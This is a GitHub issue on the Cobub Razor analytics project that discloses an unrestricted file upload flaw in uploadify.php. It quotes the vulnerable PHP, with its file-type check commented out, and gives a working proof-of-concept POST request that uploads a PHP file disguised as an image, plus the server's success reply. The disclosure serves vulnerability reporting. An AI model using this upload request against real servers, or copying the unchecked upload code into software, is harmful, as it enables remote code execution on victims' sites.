search

cobub / razor

Cobub Razor - Open Source Mobile Analytics Solution
http://www.cobub.com
1.13k stars 431 forks source link

Vulnerability: Cobub Razor file upload #168

Open kyrie403 opened 5 years ago

kyrie403 commented 5 years ago

Vulnerability: Cobub Razor file upload

Detail:

/web/assets/swf/uploadify.php Line 26: Determine whether $_FILES is empty->Get the document root directory+folder+name->upload file. File type is not restricted.

    if (!empty($_FILES)) {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
        $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

        // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
        // $fileTypes  = str_replace(';','|',$fileTypes);
        // $typesArray = split('\|',$fileTypes);
        // $fileParts  = pathinfo($_FILES['Filedata']['name']);

        // if (in_array($fileParts['extension'],$typesArray)) {
            // Uncomment the following line if you want to make the directory if it doesn't exist
            // mkdir(str_replace('//','/',$targetPath), 0755, true);

            move_uploaded_file($tempFile,$targetFile);
            echo $targetFile;

POC:

Construct an upload POST:

    POST /razor/web/assets/swf/uploadify.php?folder=/razor/web/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------18467633426500
    Content-Length: 213
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------18467633426500
    Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
    Content-Type: image/jpeg

    <?php phpinfo();?>
    -----------------------------18467633426500

Upload success:

    HTTP/1.1 200 OK
    Date: Fri, 29 Mar 2019 04:33:23 GMT
    Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
    X-Powered-By: PHP/5.6.27
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Content-Length: 57

    D:/***/***/WWW/razor/web/phpinfo.php

result